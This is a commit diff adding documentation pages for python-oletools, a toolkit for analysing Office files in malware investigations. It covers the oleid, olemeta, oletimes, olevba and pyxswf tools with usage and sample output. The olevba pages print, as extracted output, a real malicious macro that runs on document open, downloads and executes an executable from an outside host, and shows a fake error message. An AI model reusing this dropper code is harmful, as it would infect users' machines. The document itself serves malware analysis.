  20 +Planned improvements:
  21 +
  22 +- Extract the most important metadata fields
  23 +- Support for OpenXML files and embedded OLE files
  24 +- Generic VBA macros detection
  25 +- Detect auto-executable VBA macros
  26 +- Extended OLE file types detection
  27 +- Detect unusual OLE structures (fragmentation, unused sectors, etc)
  28 +- Options to scan multiple files
  29 +- Options to scan files from encrypted zip archives
  30 +- CSV output
  31 +
  32 +## Usage
  33 +
  34 + :::text
  35 + oleid.py <file>
  36 +
  37 +### Example
  38 +
  39 +Analyzing a Word document containing a Flash object and VBA macros:
  40 +
  41 + :::text
  42 + C:\oletools>oleid.py word_flash_vba.doc
  43 +
  44 + Filename: word_flash_vba.doc
  45 + OLE format: True
  46 + Has SummaryInformation stream: True
  47 + Application name: Microsoft Office Word
  48 + Encrypted: False
  49 + Word Document: True
  50 + VBA Macros: True
  51 + Excel Workbook: False
  52 + PowerPoint Presentation: False
  53 + Visio Drawing: False
  54 + ObjectPool: True
  55 + Flash objects: 1
  56 +
  57 +## How to use oleid in Python applications
  58 +
  59 +TODO
  60 +
  61 +--------------------------------------------------------------------------
  62 +
  63 +python-oletools documentation
  64 +-----------------------------
  65 +
  66 +- [[Home]]
  67 +- [[License]]
  68 +- [[Install]]
  69 +- [[Contribute]], Suggest Improvements or Report Issues
  70 +- Tools:
  71 + - [[olebrowse]]
  72 + - [[oleid]]
  73 + - [[olemeta]]
  74 + - [[oletimes]]
  75 + - [[olevba]]
  76 + - [[pyxswf]]
  77 + - [[rtfobj]]
0 78 \ No newline at end of file
... ...
oletools/doc/olemeta.html 0 → 100644
  View file @1d0ddff
  1 +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2 +<html xmlns="http://www.w3.org/1999/xhtml">
  3 +<head>
  4 + <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  5 + <meta http-equiv="Content-Style-Type" content="text/css" />
  6 + <meta name="generator" content="pandoc" />
  7 + <title></title>
  8 +</head>
  9 +<body>
  10 +<h1 id="olemeta">olemeta</h1>
  11 +<p>olemeta is a script to parse OLE files such as MS Office documents (e.g. Word, Excel), to extract all standard properties present in the OLE file.</p>
  12 +<p>It is part of the <a href="http://www.decalage.info/python/oletools">python-oletools</a> package.</p>
  13 +<h2 id="usage">Usage</h2>
  14 +<pre><code>olemeta.py &lt;file&gt;</code></pre>
  15 +<h3 id="example">Example</h3>
  16 +<p>Checking the malware sample <a href="https://malwr.com/analysis/M2I4YWRhM2IwY2QwNDljN2E3ZWFjYTg3ODk4NmZhYmE/">DIAN_caso-5415.doc</a>:</p>
  17 +<pre><code>&gt;olemeta.py DIAN_caso-5415.doc
  18 +
  19 +Properties from SummaryInformation stream:
  20 +- codepage: 1252
  21 +- title: &#39;Gu\xeda MIPYME para ser emisor electr\xf3nico&#39;
  22 +- subject: &#39;&#39;
  23 +- author: &#39;OFEyDV&#39;
  24 +- keywords: &#39;&#39;
  25 +- comments: &#39;&#39;
  26 +- template: &#39;Normal.dotm&#39;
  27 +- last_saved_by: &#39;clein&#39;
  28 +- revision_number: &#39;13&#39;
  29 +- total_edit_time: 4800L
  30 +- last_printed: datetime.datetime(2006, 6, 7, 14, 4)
  31 +- create_time: datetime.datetime(2009, 3, 30, 14, 18)
  32 +- last_saved_time: datetime.datetime(2014, 5, 14, 12, 45)
  33 +- num_pages: 7
  34 +- num_words: 269
  35 +- num_chars: 1485
  36 +- thumbnail: None
  37 +- creating_application: &#39;Microsoft Office Word&#39;
  38 +- security: 0
  39 +
  40 +Properties from DocumentSummaryInformation stream:
  41 +- codepage_doc: 1252
  42 +- category: None
  43 +- presentation_target: None
  44 +- bytes: None
  45 +- lines: 12
  46 +- paragraphs: 3
  47 +- slides: None
  48 +- notes: None
  49 +- hidden_slides: None
  50 +- mm_clips: None
  51 +- scale_crop: False
  52 +- heading_pairs: None
  53 +- titles_of_parts: None
  54 +- manager: None
  55 +- company: &#39;Servicio de Impuestos Internos&#39;
  56 +- links_dirty: False
  57 +- chars_with_spaces: 1751
  58 +- unused: None
  59 +- shared_doc: False
  60 +- link_base: None
  61 +- hlinks: None
  62 +- hlinks_changed: False
  63 +- version: 786432
  64 +- dig_sig: None
  65 +- content_type: None
  66 +- content_status: None
  67 +- language: None
  68 +- doc_version: None</code></pre>
  69 +<h2 id="how-to-use-olemeta-in-python-applications">How to use olemeta in Python applications</h2>
  70 +<p>TODO</p>
  71 +<hr />
  72 +<h2 id="python-oletools-documentation">python-oletools documentation</h2>
  73 +<ul>
  74 +<li><a href="Home.html">Home</a></li>
  75 +<li><a href="License.html">License</a></li>
  76 +<li><a href="Install.html">Install</a></li>
  77 +<li><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</li>
  78 +<li>Tools:
  79 +<ul>
  80 +<li><a href="olebrowse.html">olebrowse</a></li>
  81 +<li><a href="oleid.html">oleid</a></li>
  82 +<li><a href="olemeta.html">olemeta</a></li>
  83 +<li><a href="oletimes.html">oletimes</a></li>
  84 +<li><a href="olevba.html">olevba</a></li>
  85 +<li><a href="pyxswf.html">pyxswf</a></li>
  86 +<li><a href="rtfobj.html">rtfobj</a></li>
  87 +</ul></li>
  88 +</ul>
  89 +</body>
  90 +</html>
... ...
oletools/doc/olemeta.md 0 → 100644
  View file @1d0ddff
  1 +olemeta
  2 +=======
  3 +
  4 +olemeta is a script to parse OLE files such as MS Office documents (e.g. Word,
  5 +Excel), to extract all standard properties present in the OLE file.
  6 +
  7 +It is part of the [python-oletools](http://www.decalage.info/python/oletools) package.
  8 +
  9 +## Usage
  10 +
  11 + :::text
  12 + olemeta.py <file>
  13 +
  14 +### Example
  15 +
  16 +Checking the malware sample [DIAN_caso-5415.doc](https://malwr.com/analysis/M2I4YWRhM2IwY2QwNDljN2E3ZWFjYTg3ODk4NmZhYmE/):
  17 +
  18 + :::text
  19 + >olemeta.py DIAN_caso-5415.doc
  20 +
  21 + Properties from SummaryInformation stream:
  22 + - codepage: 1252
  23 + - title: 'Gu\xeda MIPYME para ser emisor electr\xf3nico'
  24 + - subject: ''
  25 + - author: 'OFEyDV'
  26 + - keywords: ''
  27 + - comments: ''
  28 + - template: 'Normal.dotm'
  29 + - last_saved_by: 'clein'
  30 + - revision_number: '13'
  31 + - total_edit_time: 4800L
  32 + - last_printed: datetime.datetime(2006, 6, 7, 14, 4)
  33 + - create_time: datetime.datetime(2009, 3, 30, 14, 18)
  34 + - last_saved_time: datetime.datetime(2014, 5, 14, 12, 45)
  35 + - num_pages: 7
  36 + - num_words: 269
  37 + - num_chars: 1485
  38 + - thumbnail: None
  39 + - creating_application: 'Microsoft Office Word'
  40 + - security: 0
  41 +
  42 + Properties from DocumentSummaryInformation stream:
  43 + - codepage_doc: 1252
  44 + - category: None
  45 + - presentation_target: None
  46 + - bytes: None
  47 + - lines: 12
  48 + - paragraphs: 3
  49 + - slides: None
  50 + - notes: None
  51 + - hidden_slides: None
  52 + - mm_clips: None
  53 + - scale_crop: False
  54 + - heading_pairs: None
  55 + - titles_of_parts: None
  56 + - manager: None
  57 + - company: 'Servicio de Impuestos Internos'
  58 + - links_dirty: False
  59 + - chars_with_spaces: 1751
  60 + - unused: None
  61 + - shared_doc: False
  62 + - link_base: None
  63 + - hlinks: None
  64 + - hlinks_changed: False
  65 + - version: 786432
  66 + - dig_sig: None
  67 + - content_type: None
  68 + - content_status: None
  69 + - language: None
  70 + - doc_version: None
  71 +
  72 +## How to use olemeta in Python applications
  73 +
  74 +TODO
  75 +
  76 +--------------------------------------------------------------------------
  77 +
  78 +python-oletools documentation
  79 +-----------------------------
  80 +
  81 +- [[Home]]
  82 +- [[License]]
  83 +- [[Install]]
  84 +- [[Contribute]], Suggest Improvements or Report Issues
  85 +- Tools:
  86 + - [[olebrowse]]
  87 + - [[oleid]]
  88 + - [[olemeta]]
  89 + - [[oletimes]]
  90 + - [[olevba]]
  91 + - [[pyxswf]]
  92 + - [[rtfobj]]
0 93 \ No newline at end of file
... ...
oletools/doc/oletimes.html 0 → 100644
  View file @1d0ddff
  1 +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2 +<html xmlns="http://www.w3.org/1999/xhtml">
  3 +<head>
  4 + <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  5 + <meta http-equiv="Content-Style-Type" content="text/css" />
  6 + <meta name="generator" content="pandoc" />
  7 + <title></title>
  8 +</head>
  9 +<body>
  10 +<h1 id="oletimes">oletimes</h1>
  11 +<p>oletimes is a script to parse OLE files such as MS Office documents (e.g. Word, Excel), to extract creation and modification times of all streams and storages in the OLE file.</p>
  12 +<p>It is part of the <a href="http://www.decalage.info/python/oletools">python-oletools</a> package.</p>
  13 +<h2 id="usage">Usage</h2>
  14 +<pre><code>oletimes.py &lt;file&gt;</code></pre>
  15 +<h3 id="example">Example</h3>
  16 +<p>Checking the malware sample <a href="https://malwr.com/analysis/M2I4YWRhM2IwY2QwNDljN2E3ZWFjYTg3ODk4NmZhYmE/">DIAN_caso-5415.doc</a>:</p>
  17 +<pre><code>&gt;oletimes.py DIAN_caso-5415.doc
  18 +
  19 +- Root mtime=2014-05-14 12:45:24.752000 ctime=None
  20 +- &#39;\x01CompObj&#39;: mtime=None ctime=None
  21 +- &#39;\x05DocumentSummaryInformation&#39;: mtime=None ctime=None
  22 +- &#39;\x05SummaryInformation&#39;: mtime=None ctime=None
  23 +- &#39;1Table&#39;: mtime=None ctime=None
  24 +- &#39;Data&#39;: mtime=None ctime=None
  25 +- &#39;Macros&#39;: mtime=2014-05-14 12:45:24.708000 ctime=2014-05-14 12:45:24.355000
  26 +- &#39;Macros/PROJECT&#39;: mtime=None ctime=None
  27 +- &#39;Macros/PROJECTwm&#39;: mtime=None ctime=None
  28 +- &#39;Macros/VBA&#39;: mtime=2014-05-14 12:45:24.684000 ctime=2014-05-14 12:45:24.355000
  29 +- &#39;Macros/VBA/ThisDocument&#39;: mtime=None ctime=None
  30 +- &#39;Macros/VBA/_VBA_PROJECT&#39;: mtime=None ctime=None
  31 +- &#39;Macros/VBA/__SRP_0&#39;: mtime=None ctime=None
  32 +- &#39;Macros/VBA/__SRP_1&#39;: mtime=None ctime=None
  33 +- &#39;Macros/VBA/__SRP_2&#39;: mtime=None ctime=None
  34 +- &#39;Macros/VBA/__SRP_3&#39;: mtime=None ctime=None
  35 +- &#39;Macros/VBA/dir&#39;: mtime=None ctime=None
  36 +- &#39;WordDocument&#39;: mtime=None ctime=None</code></pre>
  37 +<h2 id="how-to-use-oletimes-in-python-applications">How to use oletimes in Python applications</h2>
  38 +<p>TODO</p>
  39 +<hr />
  40 +<h2 id="python-oletools-documentation">python-oletools documentation</h2>
  41 +<ul>
  42 +<li><a href="Home.html">Home</a></li>
  43 +<li><a href="License.html">License</a></li>
  44 +<li><a href="Install.html">Install</a></li>
  45 +<li><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</li>
  46 +<li>Tools:
  47 +<ul>
  48 +<li><a href="olebrowse.html">olebrowse</a></li>
  49 +<li><a href="oleid.html">oleid</a></li>
  50 +<li><a href="olemeta.html">olemeta</a></li>
  51 +<li><a href="oletimes.html">oletimes</a></li>
  52 +<li><a href="olevba.html">olevba</a></li>
  53 +<li><a href="pyxswf.html">pyxswf</a></li>
  54 +<li><a href="rtfobj.html">rtfobj</a></li>
  55 +</ul></li>
  56 +</ul>
  57 +</body>
  58 +</html>
... ...
oletools/doc/oletimes.md 0 → 100644
  View file @1d0ddff
  1 +oletimes
  2 +========
  3 +
  4 +oletimes is a script to parse OLE files such as MS Office documents (e.g. Word,
  5 +Excel), to extract creation and modification times of all streams and storages
  6 +in the OLE file.
  7 +
  8 +It is part of the [python-oletools](http://www.decalage.info/python/oletools) package.
  9 +
  10 +## Usage
  11 +
  12 + :::text
  13 + oletimes.py <file>
  14 +
  15 +### Example
  16 +
  17 +Checking the malware sample [DIAN_caso-5415.doc](https://malwr.com/analysis/M2I4YWRhM2IwY2QwNDljN2E3ZWFjYTg3ODk4NmZhYmE/):
  18 +
  19 + :::text
  20 + >oletimes.py DIAN_caso-5415.doc
  21 +
  22 + - Root mtime=2014-05-14 12:45:24.752000 ctime=None
  23 + - '\x01CompObj': mtime=None ctime=None
  24 + - '\x05DocumentSummaryInformation': mtime=None ctime=None
  25 + - '\x05SummaryInformation': mtime=None ctime=None
  26 + - '1Table': mtime=None ctime=None
  27 + - 'Data': mtime=None ctime=None
  28 + - 'Macros': mtime=2014-05-14 12:45:24.708000 ctime=2014-05-14 12:45:24.355000
  29 + - 'Macros/PROJECT': mtime=None ctime=None
  30 + - 'Macros/PROJECTwm': mtime=None ctime=None
  31 + - 'Macros/VBA': mtime=2014-05-14 12:45:24.684000 ctime=2014-05-14 12:45:24.355000
  32 + - 'Macros/VBA/ThisDocument': mtime=None ctime=None
  33 + - 'Macros/VBA/_VBA_PROJECT': mtime=None ctime=None
  34 + - 'Macros/VBA/__SRP_0': mtime=None ctime=None
  35 + - 'Macros/VBA/__SRP_1': mtime=None ctime=None
  36 + - 'Macros/VBA/__SRP_2': mtime=None ctime=None
  37 + - 'Macros/VBA/__SRP_3': mtime=None ctime=None
  38 + - 'Macros/VBA/dir': mtime=None ctime=None
  39 + - 'WordDocument': mtime=None ctime=None
  40 +
  41 +## How to use oletimes in Python applications
  42 +
  43 +TODO
  44 +
  45 +--------------------------------------------------------------------------
  46 +
  47 +python-oletools documentation
  48 +-----------------------------
  49 +
  50 +- [[Home]]
  51 +- [[License]]
  52 +- [[Install]]
  53 +- [[Contribute]], Suggest Improvements or Report Issues
  54 +- Tools:
  55 + - [[olebrowse]]
  56 + - [[oleid]]
  57 + - [[olemeta]]
  58 + - [[oletimes]]
  59 + - [[olevba]]
  60 + - [[pyxswf]]
  61 + - [[rtfobj]]
0 62 \ No newline at end of file
... ...
oletools/doc/olevba.html 0 → 100644
  View file @1d0ddff
  1 +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2 +<html xmlns="http://www.w3.org/1999/xhtml">
  3 +<head>
  4 + <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  5 + <meta http-equiv="Content-Style-Type" content="text/css" />
  6 + <meta name="generator" content="pandoc" />
  7 + <title></title>
  8 +</head>
  9 +<body>
  10 +<h1 id="olevba">olevba</h1>
  11 +<p>olevba is a script to parse OLE and OpenXML files such as MS Office documents (e.g. Word, Excel), to extract VBA Macro code in clear text.</p>
  12 +<p>It is part of the <a href="http://www.decalage.info/python/oletools">python-oletools</a> package.</p>
  13 +<p>Supported formats:</p>
  14 +<ul>
  15 +<li>Word 97-2003 (.doc, .dot), Word 2007+ (.docm, .dotm)</li>
  16 +<li>Excel 97-2003 (.xls), Excel 2007+ (.xlsm, .xlsb)</li>
  17 +<li>PowerPoint 2007+ (.pptm, .ppsm)</li>
  18 +</ul>
  19 +<p>olevba is based on source code from <a href="https://github.com/unixfreak0037/officeparser">officeparser</a> by John William Davison</p>
  20 +<h2 id="usage">Usage</h2>
  21 +<pre><code>olevba.py &lt;file&gt;</code></pre>
  22 +<h3 id="example">Example</h3>
  23 +<p>Checking the malware sample <a href="https://malwr.com/analysis/M2I4YWRhM2IwY2QwNDljN2E3ZWFjYTg3ODk4NmZhYmE/">DIAN_caso-5415.doc</a>:</p>
  24 +<pre><code>&gt;olevba.py DIAN_caso-5415.doc
  25 +
  26 +INFO: Extracting VBA Macros from OLE file DIAN_caso-5415.doc
  27 +
  28 +-------------------------------------------------------------------------------
  29 +ThisDocument.cls
  30 +
  31 +Attribute VB_Name = &quot;ThisDocument&quot;
  32 +Attribute VB_Base = &quot;1Normal.ThisDocument&quot;
  33 +Attribute VB_GlobalNameSpace = False
  34 +Attribute VB_Creatable = False
  35 +Attribute VB_PredeclaredId = True
  36 +Attribute VB_Exposed = True
  37 +Attribute VB_TemplateDerived = True
  38 +Attribute VB_Customizable = True
  39 +Option Explicit
  40 +Private Declare Function URLDownloadToFileA Lib &quot;urlmon&quot; (ByVal FVQGKS As Long, _
  41 +ByVal WSGSGY As String, ByVal IFRRFV As String, ByVal NCVOLV As Long, _
  42 +ByVal HQTLDG As Long) As Long
  43 +Sub AutoOpen()
  44 + Auto_Open
  45 +End Sub
  46 +Sub Auto_Open()
  47 +SNVJYQ
  48 +End Sub
  49 +Public Sub SNVJYQ()
  50 + OGEXYR &quot;http://germanya.com.ec/logs/test.exe&quot;, Environ(&quot;TMP&quot;) &amp; &quot;\sfjozjero.exe&quot;
  51 +End Sub
  52 +Function OGEXYR(XSTAHU As String, PHHWIV As String) As Boolean
  53 + Dim HRKUYU, lala As Long
  54 + HRKUYU = URLDownloadToFileA(0, XSTAHU, PHHWIV, 0, 0)
  55 + If HRKUYU = 0 Then OGEXYR = True
  56 + Dim YKPZZS
  57 + YKPZZS = Shell(PHHWIV, 1)
  58 + MsgBox &quot;El contenido de este documento no es compatible con este equipo.&quot; &amp; vbCrLf &amp; vbCrLf &amp; &quot;Por favor intente desde otro equipo.&quot;, vbCritical, &quot;Equipo no compatible&quot;
  59 + lala = URLDownloadToFileA(0, &quot;http://germanya.com.ec/logs/counter.php&quot;, Environ(&quot;TMP&quot;) &amp; &quot;\lkjljlljk&quot;, 0, 0)
  60 + Application.DisplayAlerts = False
  61 + Application.Quit
  62 +End Function
  63 +Sub Workbook_Open()
  64 + Auto_Open
  65 +End Sub</code></pre>
  66 +<h2 id="how-to-use-olevba-in-python-applications">How to use olevba in Python applications</h2>
  67 +<p>TODO</p>
  68 +<hr />
  69 +<h2 id="python-oletools-documentation">python-oletools documentation</h2>
  70 +<ul>
  71 +<li><a href="Home.html">Home</a></li>
  72 +<li><a href="License.html">License</a></li>
  73 +<li><a href="Install.html">Install</a></li>
  74 +<li><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</li>
  75 +<li>Tools:
  76 +<ul>
  77 +<li><a href="olebrowse.html">olebrowse</a></li>
  78 +<li><a href="oleid.html">oleid</a></li>
  79 +<li><a href="olemeta.html">olemeta</a></li>
  80 +<li><a href="oletimes.html">oletimes</a></li>
  81 +<li><a href="olevba.html">olevba</a></li>
  82 +<li><a href="pyxswf.html">pyxswf</a></li>
  83 +<li><a href="rtfobj.html">rtfobj</a></li>
  84 +</ul></li>
  85 +</ul>
  86 +</body>
  87 +</html>
... ...
oletools/doc/olevba.md 0 → 100644
  View file @1d0ddff
  1 +olevba
  2 +======
  3 +
  4 +olevba is a script to parse OLE and OpenXML files such as MS Office documents
  5 +(e.g. Word, Excel), to extract VBA Macro code in clear text.
  6 +
  7 +It is part of the [python-oletools](http://www.decalage.info/python/oletools) package.
  8 +
  9 +Supported formats:
  10 +
  11 +- Word 97-2003 (.doc, .dot), Word 2007+ (.docm, .dotm)
  12 +- Excel 97-2003 (.xls), Excel 2007+ (.xlsm, .xlsb)
  13 +- PowerPoint 2007+ (.pptm, .ppsm)
  14 +
  15 +olevba is based on source code from [officeparser](https://github.com/unixfreak0037/officeparser) by John William Davison
  16 +
  17 +## Usage
  18 +
  19 + :::text
  20 + olevba.py <file>
  21 +
  22 +### Example
  23 +
  24 +Checking the malware sample [DIAN_caso-5415.doc](https://malwr.com/analysis/M2I4YWRhM2IwY2QwNDljN2E3ZWFjYTg3ODk4NmZhYmE/):
  25 +
  26 + :::text
  27 + >olevba.py DIAN_caso-5415.doc
  28 +
  29 + INFO: Extracting VBA Macros from OLE file DIAN_caso-5415.doc
  30 +
  31 + -------------------------------------------------------------------------------
  32 + ThisDocument.cls
  33 +
  34 + Attribute VB_Name = "ThisDocument"
  35 + Attribute VB_Base = "1Normal.ThisDocument"
  36 + Attribute VB_GlobalNameSpace = False
  37 + Attribute VB_Creatable = False
  38 + Attribute VB_PredeclaredId = True
  39 + Attribute VB_Exposed = True
  40 + Attribute VB_TemplateDerived = True
  41 + Attribute VB_Customizable = True
  42 + Option Explicit
  43 + Private Declare Function URLDownloadToFileA Lib "urlmon" (ByVal FVQGKS As Long, _
  44 + ByVal WSGSGY As String, ByVal IFRRFV As String, ByVal NCVOLV As Long, _
  45 + ByVal HQTLDG As Long) As Long
  46 + Sub AutoOpen()
  47 + Auto_Open
  48 + End Sub
  49 + Sub Auto_Open()
  50 + SNVJYQ
  51 + End Sub
  52 + Public Sub SNVJYQ()
  53 + OGEXYR "http://germanya.com.ec/logs/test.exe", Environ("TMP") & "\sfjozjero.exe"
  54 + End Sub
  55 + Function OGEXYR(XSTAHU As String, PHHWIV As String) As Boolean
  56 + Dim HRKUYU, lala As Long
  57 + HRKUYU = URLDownloadToFileA(0, XSTAHU, PHHWIV, 0, 0)
  58 + If HRKUYU = 0 Then OGEXYR = True
  59 + Dim YKPZZS
  60 + YKPZZS = Shell(PHHWIV, 1)
  61 + MsgBox "El contenido de este documento no es compatible con este equipo." & vbCrLf & vbCrLf & "Por favor intente desde otro equipo.", vbCritical, "Equipo no compatible"
  62 + lala = URLDownloadToFileA(0, "http://germanya.com.ec/logs/counter.php", Environ("TMP") & "\lkjljlljk", 0, 0)
  63 + Application.DisplayAlerts = False
  64 + Application.Quit
  65 + End Function
  66 + Sub Workbook_Open()
  67 + Auto_Open
  68 + End Sub
  69 +
  70 +## How to use olevba in Python applications
  71 +
  72 +TODO
  73 +
  74 +--------------------------------------------------------------------------
  75 +
  76 +python-oletools documentation
  77 +-----------------------------
  78 +
  79 +- [[Home]]
  80 +- [[License]]
  81 +- [[Install]]
  82 +- [[Contribute]], Suggest Improvements or Report Issues
  83 +- Tools:
  84 + - [[olebrowse]]
  85 + - [[oleid]]
  86 + - [[olemeta]]
  87 + - [[oletimes]]
  88 + - [[olevba]]
  89 + - [[pyxswf]]
  90 + - [[rtfobj]]
0 91 \ No newline at end of file
... ...
oletools/doc/pyxswf.html 0 → 100644
  View file @1d0ddff
  1 +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2 +<html xmlns="http://www.w3.org/1999/xhtml">
  3 +<head>
  4 + <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  5 + <meta http-equiv="Content-Style-Type" content="text/css" />
  6 + <meta name="generator" content="pandoc" />
  7 + <title></title>
  8 +</head>
  9 +<body>
  10 +<h1 id="pyxswf">pyxswf</h1>
  11 +<p>pyxswf is a script to detect, extract and analyze Flash objects (SWF files) that may be embedded in files such as MS Office documents (e.g. Word, Excel), which is especially useful for malware analysis.</p>
  12 +<p>It is part of the <a href="http://www.decalage.info/python/oletools">python-oletools</a> package.</p>
  13 +<p>pyxswf is an extension to <a href="http://hooked-on-mnemonics.blogspot.nl/2011/12/xxxswfpy.html">xxxswf.py</a> published by Alexander Hanel.</p>
  14 +<p>Compared to xxxswf, it can extract streams from MS Office documents by parsing their OLE structure properly, which is necessary when streams are fragmented. Stream fragmentation is a known obfuscation technique, as explained on <a href="http://www.breakingpointsystems.com/resources/blog/evasion-with-ole2-fragmentation/">http://www.breakingpointsystems.com/resources/blog/evasion-with-ole2-fragmentation/</a></p>
  15 +<p>It can also extract Flash objects from RTF documents, by parsing embedded objects encoded in hexadecimal format (-f option).</p>
  16 +<p>For this, simply add the -o option to work on OLE streams rather than raw files, or the -f option to work on RTF files.</p>
  17 +<h2 id="usage">Usage</h2>
  18 +<pre><code>Usage: pyxswf.py [options] &lt;file.bad&gt;
  19 +
  20 +Options:
  21 + -o, --ole Parse an OLE file (e.g. Word, Excel) to look for SWF
  22 + in each stream
  23 + -f, --rtf Parse an RTF file to look for SWF in each embedded
  24 + object
  25 + -x, --extract Extracts the embedded SWF(s), names it MD5HASH.swf &amp;
  26 + saves it in the working dir. No addition args needed
  27 + -h, --help show this help message and exit
  28 + -y, --yara Scans the SWF(s) with yara. If the SWF(s) is
  29 + compressed it will be deflated. No addition args
  30 + needed
  31 + -s, --md5scan Scans the SWF(s) for MD5 signatures. Please see func
  32 + checkMD5 to define hashes. No addition args needed
  33 + -H, --header Displays the SWFs file header. No addition args needed
  34 + -d, --decompress Deflates compressed SWFS(s)
  35 + -r PATH, --recdir=PATH
  36 + Will recursively scan a directory for files that
  37 + contain SWFs. Must provide path in quotes
  38 + -c, --compress Compresses the SWF using Zlib</code></pre>
  39 +<h3 id="example-1---detecting-and-extracting-a-swf-file-from-a-word-document-on-windows">Example 1 - detecting and extracting a SWF file from a Word document on Windows:</h3>
  40 +<pre><code>C:\oletools&gt;pyxswf.py -o word_flash.doc
  41 +OLE stream: &#39;Contents&#39;
  42 +[SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
  43 + [ADDR] SWF 1 at 0x8 - FWS Header
  44 +
  45 +C:\oletools&gt;pyxswf.py -xo word_flash.doc
  46 +OLE stream: &#39;Contents&#39;
  47 +[SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
  48 + [ADDR] SWF 1 at 0x8 - FWS Header
  49 + [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf</code></pre>
  50 +<h3 id="example-2---detecting-and-extracting-a-swf-file-from-a-rtf-document-on-windows">Example 2 - detecting and extracting a SWF file from a RTF document on Windows:</h3>
  51 +<pre><code>C:\oletools&gt;pyxswf.py -xf &quot;rtf_flash.rtf&quot;
  52 +RTF embedded object size 1498557 at index 000036DD
  53 +[SUMMARY] 1 SWF(s) in MD5:46a110548007e04f4043785ac4184558:RTF_embedded_object_0
  54 +00036DD
  55 + [ADDR] SWF 1 at 0xc40 - FWS Header
  56 + [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf</code></pre>
  57 +<h2 id="how-to-use-pyxswf-in-python-applications">How to use pyxswf in Python applications</h2>
  58 +<p>TODO</p>
  59 +<hr />
  60 +<h2 id="python-oletools-documentation">python-oletools documentation</h2>
  61 +<ul>
  62 +<li><a href="Home.html">Home</a></li>
  63 +<li><a href="License.html">License</a></li>
  64 +<li><a href="Install.html">Install</a></li>
  65 +<li><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</li>
  66 +<li>Tools:
  67 +<ul>
  68 +<li><a href="olebrowse.html">olebrowse</a></li>
  69 +<li><a href="oleid.html">oleid</a></li>
  70 +<li><a href="olemeta.html">olemeta</a></li>
  71 +<li><a href="oletimes.html">oletimes</a></li>
  72 +<li><a href="olevba.html">olevba</a></li>
  73 +<li><a href="pyxswf.html">pyxswf</a></li>
  74 +<li><a href="rtfobj.html">rtfobj</a></li>
  75 +</ul></li>
  76 +</ul>
  77 +</body>
  78 +</html>
... ...
oletools/doc/pyxswf.md 0 → 100644
  View file @1d0ddff
  1 +pyxswf
  2 +======
  3 +
  4 +pyxswf is a script to detect, extract and analyze Flash objects (SWF files) that may
  5 +be embedded in files such as MS Office documents (e.g. Word, Excel),
  6 +which is especially useful for malware analysis.
  7 +
  8 +It is part of the [python-oletools](http://www.decalage.info/python/oletools) package.
  9 +
  10 +pyxswf is an extension to [xxxswf.py](http://hooked-on-mnemonics.blogspot.nl/2011/12/xxxswfpy.html) published by Alexander Hanel.
  11 +
  12 +Compared to xxxswf, it can extract streams from MS Office documents by parsing
  13 +their OLE structure properly, which is necessary when streams are fragmented.
  14 +Stream fragmentation is a known obfuscation technique, as explained on
  15 +[http://www.breakingpointsystems.com/resources/blog/evasion-with-ole2-fragmentation/](http://www.breakingpointsystems.com/resources/blog/evasion-with-ole2-fragmentation/)
  16 +
  17 +It can also extract Flash objects from RTF documents, by parsing embedded objects encoded in hexadecimal format (-f option).
  18 +
  19 +For this, simply add the -o option to work on OLE streams rather than raw files, or the -f option to work on RTF files.
  20 +
  21 +## Usage
  22 +
  23 + :::text
  24 + Usage: pyxswf.py [options] <file.bad>
  25 +
  26 + Options:
  27 + -o, --ole Parse an OLE file (e.g. Word, Excel) to look for SWF
  28 + in each stream
  29 + -f, --rtf Parse an RTF file to look for SWF in each embedded
  30 + object
  31 + -x, --extract Extracts the embedded SWF(s), names it MD5HASH.swf &
  32 + saves it in the working dir. No addition args needed
  33 + -h, --help show this help message and exit
  34 + -y, --yara Scans the SWF(s) with yara. If the SWF(s) is
  35 + compressed it will be deflated. No addition args
  36 + needed
  37 + -s, --md5scan Scans the SWF(s) for MD5 signatures. Please see func
  38 + checkMD5 to define hashes. No addition args needed
  39 + -H, --header Displays the SWFs file header. No addition args needed
  40 + -d, --decompress Deflates compressed SWFS(s)
  41 + -r PATH, --recdir=PATH
  42 + Will recursively scan a directory for files that
  43 + contain SWFs. Must provide path in quotes
  44 + -c, --compress Compresses the SWF using Zlib
  45 +
  46 +### Example 1 - detecting and extracting a SWF file from a Word document on Windows:
  47 +
  48 + :::text
  49 + C:\oletools>pyxswf.py -o word_flash.doc
  50 + OLE stream: 'Contents'
  51 + [SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
  52 + [ADDR] SWF 1 at 0x8 - FWS Header
  53 +
  54 + C:\oletools>pyxswf.py -xo word_flash.doc
  55 + OLE stream: 'Contents'
  56 + [SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
  57 + [ADDR] SWF 1 at 0x8 - FWS Header
  58 + [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf
  59 +
  60 +### Example 2 - detecting and extracting a SWF file from a RTF document on Windows:
  61 +
  62 + :::text
  63 + C:\oletools>pyxswf.py -xf "rtf_flash.rtf"
  64 + RTF embedded object size 1498557 at index 000036DD
